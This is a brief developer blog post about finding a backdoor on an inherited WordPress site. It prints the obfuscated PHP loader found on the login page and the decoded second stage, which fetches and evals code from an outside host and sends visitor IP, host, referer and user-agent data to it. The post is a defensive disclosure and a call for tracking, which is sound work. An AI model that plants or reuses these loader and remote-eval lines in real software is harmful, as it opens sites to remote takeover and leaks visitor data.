Sep
16
Virus found on wordpress blog
Filed Under Development |
So I manage another wordpress blog for a local publication and inherited it from another designer. They use a third party hosting provider that shares the server with multiple (who knows how many) other websites.
They were excluded from Google for having bad links in their website (a virus had installed links inside their website!). I fixed this for them and cleaned the site. Took 4 or 5 hours to do the entire site, the virus was pretty engrained.
4 months later, their wordpress login page stopped working. Looking at it, I saw:
$Sy1Lz1='Sy1LzNFIy8xJjU9PLYlP'; $Sy1Lz2='zs8rSc0rKdZQyigpKb'; $Sy1Lz3='DS169KTMssSizPL8pJ0UvOz9'; $Sy1Lz4='XPySwu0SupKFHS1LQGAA=='; $Sy1Lz5=$Sy1Lz1.$Sy1Lz2.$Sy1Lz3.$Sy1Lz4; eval(gzinflate(base64_decode($Sy1Lz5)));
I couldn’t find any information on this virus, but the above text evaluates to requesting a file from a website. The line contains:
eval(file_get_contents(”http://zafiraworld.com/list.txt”));
Which then lists:
eval(file_get_contents(’http://zafiraworld.com/cgi-bin/list.cgi?ipuser=’.$_SERVER['REMOTE_ADDR'].’&sn=’.rawurlencode($_SERVER['SERVER_NAME']).’&host=’.rawurlencode($_SERVER['HTTP_HOST']).’&req=’.rawurlencode($_SERVER['REQUEST_URI']).’&lg=’.rawurlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']).’&ref=’.rawurlencode($_SERVER['HTTP_REFERER']).’&ua=’.urlencode($_SERVER['HTTP_USER_AGENT'])));
If anyone else has seen this, please write on my blog here in my comments section. Let’s track this down.
Found similar code in much larger quantities. Seems that mine was a wordpress backdoor which allows total access to the whole account with full permissions to write/delete and etc. I’m still trying to figure out how I was infected since I didn’t use anything but the clean WordPress (no additional components). Weird.
VJ.